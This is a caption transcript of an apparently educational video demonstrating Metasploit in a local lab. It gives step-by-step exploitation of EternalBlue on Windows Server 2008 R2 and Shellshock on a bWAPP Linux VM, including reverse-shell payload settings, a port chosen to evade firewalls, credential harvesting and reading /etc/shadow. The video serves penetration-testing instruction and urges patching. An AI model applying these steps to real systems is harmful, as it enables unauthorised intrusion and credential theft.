Metasploit

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
- And then we got the WIN. So we like WIN 'cause guess what that means. We successfully attack the system. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt and that's because that's exactly what it is. So if I do like whoami I get nt system authority. I have full control over this machine. I am the administrator and it was a point and click thing. And that's the power of Metasploit. If there is something like this that's out there, I don't have to do the hard work 'cause I've done EternalBlue attacks manually. That is a lot of work. The cat settings.php. Oh look, credentials. Now I go okay. So what can I do? Can I kind of work with that? Can I su to bee, and as for, okay bug. Oh, look, I've just elevated my privileges. Now I'm the bee user so if I do id or whoami, it tells me I'm bee, I'm no longer www-data. If I do sudo -l to list my sudo privileges, I put in bug that's my password. It tells me I have full sudo privileges here. So now I can sudo cat /etc/shadow, and there's all the password hashes that's protected and only administrative users can look at this. I have that capability. I have full control over this machine at this point. (upbeat music) - Everyone David Bombal back with Daniel from ITProTV. I really wanna thank ITProTV for sponsoring this video series in a previous video which I've linked here and below, Daniel showed us how to do a SQL injection. Daniel, what are you gonna show us this time? - Well, today we're gonna have a little bit of fun with my favorite closest thing that you're probably gonna get to a 'point and click' hacking tool which is known as the Metasploit framework. Now, don't get this confused with Metasploit Pro, that's a pay for money kind of thing. Metasploit framework is a free for anybody to go and download and work with and play with a framework and what that means is like, we have all sorts of great exploits in here. You just have to point it at the right target, give it the right options, and if everything goes to plan, you should be hacking away and having access to something very, very shortly. So Metasploits, yeah. We'll short that down to Metasploit and that's what we're gonna look at today. - That's great. I mean, this is like covering your favorite tools. So, this is one of your favorite tools because? - It's one of my favorite tools because time is of the essence a lot of times, and sometimes you don't wanna spend all the time that it takes to hack something manually. You've done it. You know, like, Oh yeah, I've seen this before. I just have to do X, Y, and Z, but X, Y and Z can take up a bit of time. Probably there's a Metasploit module for that which means that there is an exploit built into Metasploit that all you have to do is look for it and use it and fire and forget. And then it was easy. It took you much less time. So it's a big time saver plus it has a lot of different functionality wrapped around it that you end up using in different ways. There's scanners that are available inside of it. So if you're looking to scan certain types of things you can kind of jump in there and play with that. But if you're just looking for, I just wanna hack something I know this is a well-known vulnerability, I've found a website or a server or something on the internet that contains that vulnerability to just fire up metasploit, give it the options and fire and forget and you should be having some access. So, I liked that aspect of it. Saved me some time, let me work on things that are actually making me scratch my head and making me go, hmm, I feel like there's a way into this. And I just don't see it quite yet or I think it's like this and you're having to play with options. There's a lot of manual stuff that can go into your day when you're working through, if you're doing like a CTF or if you're on a pen test itself, especially if you're doing a pen testing engagement, you want to spend all your time manually hacking things that you know you can do, but take a lot of time. Just let Metasploit do it for you. So I liked that part it. - That's great. I mean, in this video, you gonna show us how to hack. Is it a Windows box? Is that right? - Yeah. We're gonna have two boxes today. I'm gonna go for a Windows box first, Windows server and the other one is going to be a Linux server. So we're just gonna show you how easy it can be. We'll take a little bit of set up again. Like I said, there's some options, what do I mean by that is information that we need to feed it. So it knows like, Oh, that's the IP address of the target you would like to hack at? Where am I coming back to? If I was maybe giving you a shell, how would that look? So you got to set a few options but they're very descriptive and straightforward. So it shouldn't be too big of a lift for us. - You know, I think we need to just stay from the outset. You have downloaded VMs, you're running this locally. You're not attacking a remote device. This is a penetration lab or testing lab that you running locally. Is that right? - Yes. Absolutely, I just spun up I think the VM for Windows, I was running like I had a 2008 R2 server ISO laying around. I said, "Okay, well, let's use that. "That's easy lift." And then the other one was another one of these hacking playgrounds called the bWAPP, which is the broken web application. Something, something, I forget the... Actually I'm not great with acronyms, but it's another one of those kind of prebuilt appliance type VMs that has a broken web application, has a bunch of different vulnerabilities to it. And one of them is gonna be something we can exploit with metasploit. So we'll go after that, that way. - Yeah. I'll put links below for people to download some of the stuff, but Daniel without further ado, let's show us how it's done and then we'll get into the weeds of what you actually did. - All right. I've got an icon on my desktop but if you wanna fire up from the console itself you can just type in msfconsole. That's mikesierrafoxconsole all one word lowercase, and it'll go but I'm just gonna click my little icon that I've gotten in my task bar there. And that's going to fire up and if you're going, "Whoa, Daniel, that is super small." You're absolutely right. I'll make it a little bit bigger so we can all see it. I'm just gonna let it fire up for a second. What it's doing right now is just initializing the database of exploits and auxiliary options that it does have. And once it's done, it'll drop you to this little thing here and I'll just make this look a little bit bigger. It's probably flashed the screen. It's a little weird, but there we go. And it always has some funny ASCII art at the onset there. So this is not normal. Like it's not a part of the program it's just for fun. The part of the program is right down here where it says msf5, that's what we wanna look at. So, what I'm gonna do is I'm gonna try the tried-and-true well-known well executed and well adapted to crypto-ransomware, goodness, known as WannaCry which was the EternalBlue exploit that was released. You know, it was found from the NSA and released a few years ago and you think, "Oh man, that's kind of old." It's funny. There are still areas in the world which are using older versions of Windows because they are pirated versions and they can't update. So their infrastructure is still maintained on that and they can't update it. So they're kind of stuck. What do they do? Well, they can get hacked if they leave it up on attached to the internet. So it's still a viable thing. It's something that we still see in the real world and in the live world today. So don't discount old EternalBlue it's still running around. So to find it, I just do a search, type in the word search. Get my mouse out of the way and type in what I'm looking for. So this, in this case, it's eternalblue. And then that will return back anything that defines that is related to eternalblue that it can think of based off of your search term. So you can get a little crafty with that if you need to, if you're looking for something specific, sometimes not everything comes out very easy but this one does. And I have a few options. You'll notice I have the matching modules. And then this shows me numbers. It starts counting at zero. So number zero will be this one and then it has a description right over here, MS17-010. And it tells me it's EternalRomance, EternalSynergy, EternalChampion. These were the original names for eternalblue before it kind of landed on that. So they're all kind of doing the same thing just in vaguely different ways. But it also has this. This auxiliary/scanner/smb for MS17-010. That tells me that it does a detection check for EternalBlue. Okay, well, let's start there. Let's do a scan and check for that vulnerability against our machine. So if I do use and I give it the number, so I don't even have to like copy and paste this. Normally you can just copy and paste that in there, or you can type it in, but now they've updated it. You can just use the number. So that's even easier, right? So I can just say, use 1. Bam. You'll notice my prompt has changed. It's a little bit small and I'll give you a little more real state there. Plus, there we go. I can make sure you guys can see all this. There we go. And now I have jumped down into that scanner for that. So all I could do now is check what options it needs. So I'll just type in options and here are the options. So because I've got to kind of blow it up a little big it's kind of word wrap and do some funky stuff but I'll walk you through this. So we've got check for the architecture. That setting is set to true tells me whether or not it's required and then gives me a description of what that does. Checks for architecture on vulnerable hosts. Okay, great. So, this is something it will check for even though it's not a required thing that's just a default, right? So you can kind of walk through this. What's important for us right now, well usually the main thing you need to do is tell it what's the target. And typically that is through this option right here RHOSTS or RHOST. The two main ways in which you see that usually vetted out. So if you see RHOSTS or RHOST it's asking what is the remote host in which you wish to attack. And you can see that's right over here. The target host or hosts, and you can put the range of the CIDR identifier and also the good stuff, right? I think that's all I need here. It's already got the port set which is the right one which is 445. So I just set that. So sets rhosts and that will be the IP of my server, which is 21. There we go. Set that-- - [David] Your Windows server, yeah? - Yeah, this is my Windows server. I can check the options again to make sure that that went through and we can see now that has changed to the IP of that server. At that point, you can type one or two things. If you want to be super elite, you type exploits. So I wanna be super elite, (David laughs) so I'm gonna type exploit. There we go. And we see that it comes back very quickly. The host is likely vulnerable to MS17-010, and then it even gives me that it is a Windows Server 2008 R2, suite. So, we've got a good information. Now, all we have to do is gain that access, right? So I'm gonna search again for eternalblue. I can't type, (Daniel chuckles) blue, there we go. And then I do have some options. I have some different options. Some may work, some may not work. This is sometimes where it can be a bit of a trial and error thing. So you might just... Good news is there's not many options for us here, so it wouldn't take as much time to kind of walk through each one of these if we were kind of playing a guessing game. One of them right out of the GET tells me this is for Windows 8, right? Well, I'm not attacking Windows 8 box. So I can go ahead and disregard that. But what's another one that we have here, we've got this one is an exploit. And you'll notice that they start with exploits, right? Exploit for Windows/smb, and then gives the Microsoft equivalent of a CVE for the actual vulnerability for their system. It even tells you like whether or not it works very well. This is average, but for us this is gonna be the one we want. Right? So the good news is out of the GET it was the first one that we needed. So I'm gonna do you use 2. So use 2 'cause that's the one we want. Our prompt has changed and we need to go in here and check those options. Now that we've got those options up, you'll see that there's RHOSTS right there. So obviously that's something we need to give it. It did also kind of tell us right here, no payload is configured. The payload is once I attack this thing I can make it do whatever I want. What is it that you want me to make it do? So it's saying nothing is configured and it's defaulting to this payload, which is a reverse shell. So send me back a command prompt so that I can control the machine. I don't wanna use the interpreter when I'm gonna change it so that you can see that and kind of get some more information on how to use this, but it's a pretty simple thing to do. All right. So let's start setting some stuff, and you'll notice that down here, the exploit target of information is there as well. It tells me Windows 7 and Windows server 2008 R2 (x64) Hey, isn't that the one we just found? It is. (David laughs) Like it was planned, right? So let's see here. Let's set that rhosts. Rhosts, it used to be that case sensitivity was a thing, but now it's not. Or I think it was, but now it's not. So you don't have to worry about that. And that is 10.10.10.21, all set. Good to go. What else do we need to set here? As far as the target goes, I think that is it's. Now we need to set that payload. So I wanna change that payload. So I'm gonna say set payload and I wanna set it to something I wanted. Well, I know this is a Windows thing. If you're like, "Oh, you know what? "Payloads are available." You can kind of do like a list payloads and they'll show you the ones that you can, oh I'm sorry. I think it's show payloads. Do a show payloads. There's a lot of payloads you can give it. So I'm not gonna bog us down with that. I already know the one I want. So Windows (x64)/nt shell_reverse_TCP. There we go. It didn't complain. So I must've chose something that actually worked for this, go back to options and we can see now this has been set under the payload. Now I have to do is set the LHOST which is the listening host. This is gonna be my attacking server so that knows where to send that information to and what port to go on. So I'm gonna change the host and the port because the Windows box doesn't know what 127.0.0.1 is other than itself. So that's not gonna work So we need to set lhost, which will be my box, it's just 10. 10. 10. 10. And then I like to set my port. So lport to be something that's probably gonna bypass any kind firewalling that might be. So 443 is a great one because you know a lot of times firewalls allow port 443. So if there was any firewall blocking on something like 4444 I wouldn't have an issue with this. I would still get my show. At this point, we are ready to Script Kiddie it up and type the word exploits. Right? (David laughs) Let's do that exploits all day long. All right. So this is all information wrapped around what it's doing. It's trying to just let you know whether or not it's being successful, what's happening and what it's trying to do at that point in time. A lot of interesting things going on here. I do like how it says the overwrite completed successfully, that makes me feel good about this attack. I have seen this kind of like, I'd have to do it over and over and over again. It didn't just work. The first time I had to be a little persistent. It will try to re-attack, attack, attack over and over again. So sometimes that's the case. We are also working in virtualization. So when you're throwing attacks like this at machines it can start to break things, right? Because it's not really, you know, machines aren't designed to be attacked. They're designed to work normally. So if it's messed up... So you can see this like failed right out of the gate. Right? But that's okay 'cause it's trying again. It's gonna try something else and see, well maybe if we try a little move in here. Oh, look at that. And then we got the WIN. So we like WIN 'cause guess what that means? We've successfully attack the system we're going on, okay? - [David] What do I do now? - It says, we won. What do we do? I'm gonna hit answer. Oh, there we go. Sometimes that happens. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt. And that's because that's exactly what it is. So if I do like whoami, I get nt system authority. I have full control over this machine. I am the administrator. And it was a 'point and click' thing, I mean hope it was pretty easy. It's at least as far as what you guys saw on the other end. And that's the power of Metasploit. If there is something like this that's out there. I don't have to do the hard work 'cause I've done EternalBlue attacks manually that is a lot of work. Actually ended up writing my own EternalBlue attack script because I was like, man I'm never gonna remember how to do all these things. I'll have to create a workflow. So lemme just create a script that does it all for me. And then it was like, "Oh no dog. "You just got to go over to-- (chuckles) So use metasploit. It's got the module. Oh, that's right, Metasploit it's there. So it makes your life a whole lot easier for getting those low-hanging fruits without spending a lot of time and effort on it. So there's a Windows machine against a system level problem that it has. And we explore that. - You have admin access. - Full admin access - You could load something on there so you could get back to this later, but it was re-- - Oh yeah, I could upload malware here. I could create a backdoor user, create a PowerShell script that does X, Y, or Z. I'm full control at this point of this machine. I can turn on, like, if it didn't have RDP enabled I could turn on RDP, create a user, that's an admin user. And then log in using RDP and have my full Windows graphical loveliness, all I want. Then I can do post exploitation things like grabbing password hashes and cracking them so that I have other people's passwords. And maybe I can use those passwords to gain access to other machines that don't have this. So, it's a great stepping stone. So once you find some easy access such as this, it's just now that the tumblers are gonna start to fall and I'm starting to work my way through the network at large instead of just the one machine. - So, I mean, basically what you did is you used Metasploit. That's just something that you can download. And then, - You're right. - And all you did is you just followed some prompts you entered some very basic information, IP address. I can't remember what else. It wasn't very much. (chuckles) - It wasn't very much. - You basically just told it which attack to launch. And I just wanted to emphasize this. If you hadn't used this, it would have been a lot of work. Like you said to be able to crack this, is that right? - Yeah, absolutely. Like I said, I've done it manually before and that is not the way to fly. This is so much easier. Now I have more control over those manual options. It's easier for me to make fine tune adjustments or things of that nature to the stuff that I've done. But for the most part these scripts work right out of the box. We had one failure and then it went right away and said, "Oh yeah, we're good. "I've got it. "Here you go." And I just sat here and waited. That's all I had to do, was wait. I could have been running other scans and doing other things while this is hacking stuff for me. So that automation of doing things like that, making your workflow so much faster grabbing low hanging fruit that it's not gonna take you forever so that you can start to, well, you probably will need to, at that point pivot into I don't know if they're using bad security like this running an old server systems that are unpatched, things of that nature, then yeah. They're kinda getting what they got coming. It's probably not gonna be too easy to get through the rest of it either, but you do see that from time to time. Sometimes developers spin up machines like this so that they can start working on something because that's what they had available. - I heard of a very big company that got hacked recently that had some server wasn't it that SolarWinds or something? - Oh yeah, that's right. (David laughs) Now, to their defense that was a O'Day or a zero day exploit where some very smart people found a very esoteric flaw, built a tool that exploits that flaw and exploited it. So like, I don't wanna throw SolarWinds too hard under the bus on that. Like there's no way they could have prepared for that. They just didn't know that it was a flaw. Somebody found it, exploited it. They just happened to be one of the biggest names in the industry and are hooked into some of the largest organizations such as the United States Government and Military, which is what caused the problem. - So I mean, this work because there was a vulnerability or an exploit in a Microsoft operating system that-- - Yeah. - And this is like you said, this is the reason why you wanna patch your systems, yeah? - Exactly. This is why you wanna make sure you're doing the updates and patching that comes through. Have a good patching cycle. Can't tell you how many pen testers I've talked to. They're just like, man, if they just had had a scheduled patching cycle where they are applying patches in a systematic way, this never would have happened. We never would've gotten this far or that attack wouldn't have been successful or such and such and such, like it's how many times I've heard that? I can't tell you. It's something as simple as just making sure that you are updating and patching your systems. - So, I've heard Linux is secure. I mean, you're hacking Windows but Linux can surely not be hacked. - Yeah, I hacked. That's absolutely not true. (David laughs) I hack it all the time. Again. I wanna kind of give you that look, so I'm gonna use an older thing, but if you're not updating, it will still be available to you. And I just wanted, again, more to showcase Metasploit than it was to show my elite hacking skills. It was more about let's take a tour of Metasploit and how it works and what it can do. So it was cool. We can see what it does with Windows. Let's go after something completely different like Linux. Right. So let's do that. I'm gonna get out of my shell here. - [David] I mean, that's the point. I mean, this stuff happens all the time. - [Daniel] Right. - [David] I'm just showing like a simple example for demonstration. Well, I mean, I shouldn't say simple. You showing an example for demonstration purposes but I mean, this stuff takes place all the time. - Absolutely. And then this is just what I could think of immediately off the top of my head so I can come in here again and do this demonstrations. There are other vulnerabilities that are much more current and recent that have Metasploit modules. So if I had that infrastructure set up we would have been able to demo that. That, that would have just been a lot of lift to like build an infrastructure that would allow for something like that. So I went with the easy button so that we can take a look at Metasploit and what it can do. So I've got another server, Linux server and this time I'm gonna search for seach for shellshock. I don't know if you guys remember that one, but shellshock was a horrible bug that plagued the Linux operating system and went undiscovered for many, many years. And once it was discovered, it was like, "Oh no, this no good." Because it gave you access into people's systems and allowed you to, what's called? Remote code execution. And I can execute code from a remote location. It would do those things or commands. So that was bad. So my server, after I've done all my pregame, like my recon and things, I've found that it's running apache, it's got a web server going. I found the CGI bin area, which is where you're looking for. If you're looking for shellshock. And then I went to Metasploit and I found this one right here which looked to fit my bill very nicely. Right? So it's going after apache under the mod_cgi_bash environment. Oh, everything (smooch) looking for that exactly. Now I did some testing. You can also find some testers, I think there's a auxiliary scanner. Yeah. So first specific one DHC clients. Oh, here's one for apache multi. So you could have scan for it using this as well. I just did my own recon on that. And there we go. I know exactly where I want to attack this thing so I know what options to set. Right? That's the options. So for this one, it's going to be, let's see. Let's take a look at the options and we're gonna use 5 that's right. Use 5. Now look at those options. And we have a few let's see here. Now we are gonna set a bit more options than we did where well, I had to set the host and then set that payload correctly. Right? But let's take a look. Some of the things that we do need, like the header, that's gonna go out. These are the HTTP headers that you wanna use as it says right there. And if you need to change that to like a post method, but GET is the one we're gonna use. So that's fine that that's the default. I do need to change that. I'm not gonna use User-Agent. I wanna set that to the referrer header which is where I found the vulnerability in this application. So I need to do that. Let's do that, we have the get set header which will be referer. So options again just to make sure that's set. I'm super anal about making sure everything got set the way I wanted it to because I have made typos in the past. And you're like, "Why isn't this working?" So typos can definitely kill your game really quickly. I don't know how many proxies. I do have an RHOST though. Right? There it is right there. So let's set that. Set rhosts, which is 10.10.10.17 for this server. All right. Show me those options. And let's see here, there it is. Set that well, great. It's over port 80, so that's fine. I think that's all good. Our path, that's fine as well. Don't need any of this. It looks like our target. Oh, we got one more thing. Targeturi. This is the actual path to the script that we're gonna exploit that I have found using Burp Suite. And again, once we get to the Burp Suite, sure you'll be like, "Man, he's got all this information. "Where does he get it from?" Burp Suite. Right. So we'll have some fun with some Burp Suite coming up very shortly. Not today, but in another one. All right. So let's set that targeturi. So set, targeturi which if I remember is BWAPP that's then cgi-bin/shellshock.sh. Okay, now that I've got this set the last thing I have to do is set our payload which is this person right here. Right? And I'll just stick with the default on that. We don't need to fiddle around with it. So sets lhosts of 10. 10. 10. 10 which is my Kali server. That's the local hosts or the listening host, right? With that I'll leave the port. What the heck? I know that's should be fine. And I will hit exploits because it is time to exploits. Oh yes. The session has opened, right? 'Cause it says right there, interpreter two has opened. So this is using the built in session management, shell management that Metasploit has available. It's a very handy thing as well. Just depending on what you're attacking you might wanna go with one or the other but I can just type in shell. And then this is one channel created id. Hey, look at that, host name like that. You do the same on the bee-box. If I wanna pretty this up, I can throw some Python at it. Let's see here, import a nice pty shell of bash. So pty.spawn and throw this in there /bins/bash. Bam, bam. And now, Oh, it didn't like it. You're right. Yeah. Import pty. (chuckles) Okay. That's right. That was absolutely wrong. Lemme try that again, python -c import. Why am I doing that? Import pty and then there's what I'm looking for. Pty.spawn. P-A-W-N. I'm the world's worst typist. - [David] Don't worry. (Daniel chuckles) - /bin/bash. There we go. Let's try that. And then you see, I get a nice like regular looking Linux prompt. It's just one way to make that happen but that's the one I typically used. But now I'm in the system, I can start doing things. No ls, here's the file I can do pwd, start looking for ways to elevate my privileges inside the machine. If anything shows itself and greats, I grabbed the mountaintop. I start doing post exploitation type of information, grabbing password hashes, doing the cracking thing on the back end, looking for pivoting all of the good stuff. But as you saw, it wasn't that difficult. Throwing some options. - You got root in that device, did you? - No, I'm actually logged in with the service account. As you can see, if I do id, I'm actually logged in with the service account of apache, which is www-data. - Oh yes, you we're tackling an apache script, is that right? - That's exactly right. And since it was running with the permissions of that service account that's the account we got when it ran the code to give me a shell back to a Metasploit. - But the point is you managed to get a shell on a remote machine by exploiting a vulnerability in apache or something. - Yeah. And from here, you just like I said, you start doing other stuff, right? So where are we? Cgi-bin Let's get out of there. Let's go to cd/var/www, take a look in there. And you'll notice we've got the bee-cd bWAPP. And then here is the actual web application, all the PHP pages that make it up. I can start looking at things like there's an admin folder. I wonder what's in that. Let's go there. Cd/admin, ls, CD slash oh, it's not slash admin. It's just admin. (chuckles) Ls there. And I've got like a settings of what if I cat settings.php. Oh, look credentials. Now I go okay. So what can I do? Can I work with that? Can I su to bee? And as for okay, bug. Oh, look, I've just elevated my privileges. now I'm the bee user. So if I do id or whoami, It tells me I'm bee, I'm no longer www-data. If I do Sudo -l to list my sudo privileges, I put in bug, that's my password. It tells me I have full sudo privileges here. So now I can Sudo cat/etc/shadow. And there's all the password hashes that's protected. And only administrative users can look at this. I have that capability. I have full control of this machine at this point. - So yeah, you've just shown us how to get root or administrator on Windows and root privileges on a Linux box. - Yes. Well, at least one way. - Yeah, one way. But I mean, it's really cool. I mean, it wasn't that difficult. - No. If you know what to do, if you're familiar with these things and you just start looking around and you never know what you'll find. - So I mean, let's step back now and discuss what we've done. - Yeah. - So this is Metasploit and this is an application that you just download from the internet, it's free. Yeah. - Oh yeah. It's totally free. The Metasploit framework, Metasploit pro is some money, that costs a bit of the Do-Re-Mi, but Metasploit framework, you should be able to just install. So if you're running something like Ubuntu or Mint or some other red hat or something like that with Ubuntu and Debbie and Variations it would be an app yet a way of installation. If you don't have it, you're running Kali. I think pretty sure it comes pre-installed and you're off to the races. Use just msfconsole and it fires it right up and you're ready to go. - Yeah. So men, all you had to do top that command then you'd be at the point that you demonstrated. And then it's literally just tapping these few commands that you demonstrated. - That's it. That's it. - So it's not very difficult. So, I mean, I know Script Kiddie is that kind of thing is kind of frowned upon in the cybersecurity space but tools like this, are they useful for professionals? - Absolutely, they're useful in professionals. They're probably not using the free versions of these kinds of tools. They're probably using the professional versions of these kinds of tools which have more functionality, more customability, right? So you can customize them, customizability, I guess is the right word. You customize them in a way that works and you can make them make changes a whole lot easier. Not that you can't customize this, you absolutely can. But if you're a professional, you will be going with the pro versions of these types of tools. So like Cobalt Strike and Metasploit, that's another one that's a really high professional grade tool that's very similar to what we're seeing here but has some graphical options to them as well, so does Metasploit pro it has a nice graphical option to mess around with, but if you do wanna play with some graphics you want more of a gooey experience with Metasploit, you can use Armatage, which is free. It's kind of like a graphical front end that wraps around Metasploit and it can be really useful. Plus it's really cool looking. I actually like using it because it gives you some some pretty neat options and you can point and click or stuff. So if you want that just go with Armatage, get that installed. You're ready to go. - That's great Daniel. I mean, just give us a teaser. What other tools or things are you gonna show us in upcoming videos? - Yeah, you know I'm sitting here looking at these password hashes and I'm thinking, "Hey, let's do some password cracking." That'd be a good one. That's something that is a good skill to have and understand and know and see how that works. So I typically revert to the easiest one available which is John the Ripper because it does a great job. There are others available, but John the Ripper would probably smoke there at least a couple of these things. And maybe we can find some passwords. We can grab some Windows password, see if we can break those as well. And just see how John the Ripper works. We'll play around with that. Obviously we've been talking about Burp Suite. We'll have to do a (speaking in foreign language) of Burp Suite, (David laughs) kind of go through some of the more common options and things that you can do with Burp Suite and see why is that such a popular tool because it is, and for good reason. So we'll do that as well. - Yeah. I'm looking forward to it, Daniel. Thanks so much for sharing your knowledge with us and big thanks to ITProTV for sponsoring this, but Daniel, thanks very much. - Hey, no problem, man. Thanks for having me. (upbeat music)
Info
Channel: David Bombal
Views: 69,668
Rating: undefined out of 5
Keywords: metasploit, metasploit kali linux how to use, metasploit penetration testing, metasploit framework in kali linux, metasploit project, metasploit tutorial, metasploit framework, metasploit tutorial for beginners kali linux, metasploit tutorial for beginners, kali metasploit, kali linux, metasploitable, cybersecurity, eternalblue, eternal blue, eternalblue explained, eternalblue exploit, shellshock, shellshock live
Id: ES2P2hWuzDo
Channel Id: undefined
Length: 34min 20sec (2060 seconds)
Published: Fri May 07 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.